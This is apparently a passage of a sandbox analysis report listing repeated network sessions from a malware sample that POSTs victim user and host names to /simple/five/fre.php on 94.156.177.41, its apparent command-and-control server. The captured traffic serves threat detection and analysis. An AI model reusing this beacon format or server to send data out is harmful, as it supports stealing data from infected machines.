Jan 11, 2025 01:43:49.953025103 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:43:49 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
95	192.168.2.8	51368	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:43:50.107481956 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:43:50.112870932 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:43:50.836159945 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:43:50 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
96	192.168.2.8	51374	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:43:50.987092018 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:43:50.991939068 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:43:51.718250990 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:43:51 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
97	192.168.2.8	51380	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:43:51.867959023 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:43:51.872833014 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:43:52.589922905 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:43:52 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
98	192.168.2.8	51388	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:43:53.006314039 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:43:53.011219025 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:43:53.747992039 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:43:53 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
99	192.168.2.8	51395	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:43:53.899141073 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:43:53.904053926 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:43:54.614797115 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:43:54 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
100	192.168.2.8	51403	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:43:54.758891106 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:43:54.763803959 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:43:55.488706112 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:43:55 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
101	192.168.2.8	51406	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:43:55.921688080 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:43:55.926731110 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:43:56.636090994 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:43:56 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
102	192.168.2.8	51415	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:43:56.794159889 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:43:56.799040079 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:43:57.548434019 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:43:57 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
103	192.168.2.8	51421	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:43:57.701728106 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:43:57.706794024 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:43:58.432677984 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:43:58 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
104	192.168.2.8	51427	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:43:58.601829052 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:43:58.606872082 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:43:59.293932915 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:43:59 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
105	192.168.2.8	51433	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:43:59.453828096 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:43:59.461313009 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:44:00.168755054 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:44:00 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
106	192.168.2.8	51439	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:44:00.322475910 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:44:00.327730894 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:44:01.029828072 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:44:00 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
107	192.168.2.8	51446	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:44:01.201200962 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:44:01.206037045 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:44:01.910991907 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:44:01 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
108	192.168.2.8	51454	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:44:02.061801910 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:44:02.066708088 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:44:02.787935972 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:44:02 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
109	192.168.2.8	51459	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:44:03.046463013 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:44:03.052321911 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:44:03.775012016 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:44:03 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
110	192.168.2.8	51468	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:44:03.933855057 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:44:03.938793898 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:44:04.664005041 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:44:04 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
111	192.168.2.8	51474	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:44:04.869992018 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:44:04.874882936 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:44:05.575776100 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:44:05 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
112	192.168.2.8	51480	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:44:05.895147085 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:44:05.900134087 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:44:06.644947052 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:44:06 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
113	192.168.2.8	51486	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:44:06.789382935 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:44:06.794404030 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:44:07.690494061 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:44:07 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
114	192.168.2.8	51497	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:44:07.837692022 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:44:07.842580080 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:44:08.542829037 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:44:08 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
115	192.168.2.8	51503	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:44:08.803481102 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:44:08.809214115 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:44:09.524636984 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:44:09 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
116	192.168.2.8	51509	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:44:09.686638117 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:44:09.691469908 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
